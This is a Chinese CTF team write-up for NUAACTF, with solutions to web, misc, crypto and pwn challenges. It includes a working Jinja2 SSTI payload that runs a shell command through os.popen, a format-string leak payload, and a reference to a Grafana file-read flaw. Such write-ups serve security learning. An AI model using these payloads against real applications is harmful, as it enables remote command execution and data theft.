[NUAACTF] 壞女人讓我嘗盡愛情的苦戰隊 WriteUp

簽到

簽到

flag{we1c0m_t0_asur!ctf}

Web

baby_python

簡單的ssti 字符串拼接繞過，用加號拼接一下就可以繞過：

name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'ev'+'al' in b.keys() %}{{ b['ev'+'al']('__import__("o"+"s").popen("cat flllll11111114aaaaaggggggggggggg").read()') }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

真的簽到

最近出現的一個nday，百度一下就可以找到Grafana 8.x任意文件讀取漏洞的相關信息

Twister

js里看到注釋，還有一段混淆的代碼，直接把混淆代碼丟進控制台運行一下：

然后查看Cookie得到flag：

Misc

baby_mix

打開壓縮包發現需要密碼，用winhex看一下發現是個偽加密

將0900改為0000即可

打開壓縮包是一個png圖片

在R通道最低位可以看到一個二維碼

掃碼一下得到：

4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d

hex base32 base58 base64依次解碼即可得到flag

medium

在IEND后面還有很多數據，是一個base編碼

全部提取出來：

RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==

base64得到：

F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80  E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92

在hex解碼一下得到：

🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅😀🤣⌨🐍☀🥋😆🙃🎃🐘🍍☂🚪🌪💵🚨⌨😁🔪✖🎈🌏🔄🖐🦓🌏🕹😍👌🌉💵🏎🚫🤣🖐💧🍍🌿😍🍎🚨🐎💵🌿🏹🎅🙃👑😆☃🐅🕹😇🏹🏹🍵🎈🍎🤣😁🍍🚨🏹👣🔄🤣🎈😂🐍✅😀✅🚪😎😀🗒🗒

根據題目描述，你知道AES嗎？那這道題對你來說太簡單啦
可知這是一個emoji的aes加密，缺少一個key，key肯定就在key.wav里了

看一下key.wav的頻譜圖，得到：

MudaMudaMudaMuda

https://aghorler.github.io/emoji-aes/#

最后做一個aes-emoji解密即可

得到最終flag：

flag{AES_1s_Gr3atS0_y0u_L1ke_1t_V3ry_Much}

我們生活在南京（一）——穿越時空的電波

將音頻反轉一下，即可聽到希臘字母。

根據題目描述：

他們用無線電中慣用的方法區分字符串中讀音相近的字母。

對應一下即可得到flag：

flag{radiowavesacrosstime}

我們生活在南京（二）——等幅電報？

下載附件得到一個mp3音頻，根據題目描述CW可知這是一個摩斯碼

fuzz一下發現摩斯碼在頻譜圖里

短波為'.'，長波為'-'，得到：

..-. .-.. .- --. -.-. .-- .. ..... ....- - .-. ....- -.. .. - .. ----- -. -- ...-- - .... ----- -..

morse解密一下得到flag：

flag{cwi54tr4diti0nm3th0d}

Re

IDA Start

Crypto

checkin

oclz{loovyd_vb_l_bvnucd_hqpumj}

//(11x + 11) mod 26

仿射密碼

from Crypto.Util.number import*
a = 'oclz{loovyd_vb_l_bvnucd_hqpumj}'
table = 'abcdefghijklmnopqrstuvwxyz'
flag = ''
for i in a:
    if i in table:
        val = table.index(i)
        val = (val-11)*inverse(11,26) % 26  
        flag += table[val]
    else:
        flag += i
print(flag)

easyRSA

發現文件需要讀其中的數據data1,data2都是對相同的一個m進行的加密，並且能知道這個是一個共模攻擊。不過padding里面需要去寫一個unpad

from Crypto.Util.number import*
fi1 = open('flag.enc1','rb')
fi2 = open('flag.enc2','rb')

data1 = fi1.read()
data2 = fi2.read()
fi1.close()
fi2.close()

def unpad_even(x):
    if x[:1] == b'0' and len(x)%2 == 1:
        return x[1:]
    else:
        return x
# print(data2)
data1 = unpad_even(data1)
data2 = unpad_even(data2)
c1 = bytes_to_long(data1)
c2 = bytes_to_long(data2)
N = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929

e1 = 17
e2 = 65537
 
import gmpy2
g,x,y = gmpy2.gcdext(e1,e2)
print(long_to_bytes(pow(c1,x,N) * pow(c2,y,N) %N))

Guessgame

這道題目很神奇，發現如果對他進行只發送1的話，會導致他數的最后一位是1的位置變成0

然而他卻只有50次機會，那么我們可以通過一直發1，最后7次發0 把num變成0之后再進行加分

from pwn import *
context.log_level = 'debug'
io = remote("ctf.asuri.club",10000)
for i in range(43):
    io.recv()
    io.sendline(b'1')
for i in range(7):
    io.recv()
    io.sendline(b'0')
io.interactive()

Numbers

發現這里ax-by=1；a,b已知；可能首先回想到擴展歐幾里得定律，但是這道題到第三關之后會有點問題。

ax-by = 比較大的數了。

所以這時候就應該去找連分數的方法。

然后在網上找到腳本去做：

from pwn import *
def CCFF(x, y): 
    cF = [] 
    while y: 
        cF += [x // y] 
        x, y = y, x % y 
    return cF 
def CONVER(ctnf): 
    numerator = 0 
    denominator = 1 
    for x in ctnf[::-1]: 
        numerator, denominator = denominator, x * denominator + numerator 
    return (numerator, denominator) 

def MY_XY(c): 
    cf=[] 
    for i in range(1,len(c)): 
        cf.append(CONVER(c[:i])) 
    return cf 

def attack(a,b,val): 
    cf = CCFF(a,b) 
    if len(cf) & 1: 
        cf = cf[:-1] + [cf[-1]-1, 1] 
    for i in MY_XY(cf):
        x,y = i
        if a*x-b*y == val: 
            return x, y

def recs():
    io.recvuntil(b'Level ')
    io.recvline()
    a = io.recvuntil(b'*')[:-1]
    io.recvuntil(b'x-')
    b = io.recvuntil(b'*')[:-1]
    io.recvuntil(b'=')
    val = io.recvline().strip()
    a = int(a)
    b = int(b)
    val = int(val)
    print(val)
    x,y = attack(a,b,val)
    io.recv()
    io.sendline(str(x).encode())
    io.sendline(str(y).encode())
# context.log_level = 'debug'
while 1:
    try:
        io = remote("ctf.asuri.club",10001)
        for i in range(5):
            recs()
        io.interactive()
    except:
        io.close()
        continue
# flag{C0ntInu3d_fR4cTioNs_4r3_1nter3stinG}

Pwn

format

格式化字符串，指向flag的指針在棧上用%s可以直接輸出，偏移是7 payload為%7$s